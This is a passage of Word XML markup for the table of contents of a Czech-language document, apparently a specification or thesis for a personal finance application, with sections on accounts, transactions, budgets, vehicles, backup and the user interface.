            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>Uživatelé</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327843 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>37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4" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>5.1.2</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>Správa účtů</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327844 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>37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5" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>5.1.3</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>Správa transakcí</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327845 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>38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6" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>5.1.4</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>Statistiky</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327846 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>38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7" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>5.1.5</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>Plánování</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327847 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>39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8" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>5.1.6</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>Správa vozidla</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327848 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>39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49" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>5.1.7</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>Import a export dat</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327849 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>40</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50" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>5.2</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:smallCaps w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>Nefunkční požadavky</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327850 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>40</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51" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>5.3</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:smallCaps w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>Případy užití</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327851 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>40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2" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>5.3.1</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>Uživatelé</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327852 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>41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3" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>5.3.2</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>Správa účtů</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327853 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>49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4" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>5.3.3</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>Správa štítků</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327854 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>53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5" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>5.3.4</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>Správa transakcí</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327855 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>57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6" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>5.3.5</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>Správa opakovaných transakcí</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327856 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>62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7" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>5.3.6</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>Správa rozpočtů</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327857 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>65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8" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>5.3.7</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>Správa vozidel</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327858 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>68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59" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>5.3.8</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>Zálohování a obnova dat</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327859 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>73</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860" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>6</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:b w:val="0"/>
            <w:caps w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>Uživatelské rozhraní</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327860 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>75</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61" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>6.1</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:smallCaps w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>Přehled a evidence transakcí</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327861 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>76</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62" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>6.2</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:smallCaps w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>Správa</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327862 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
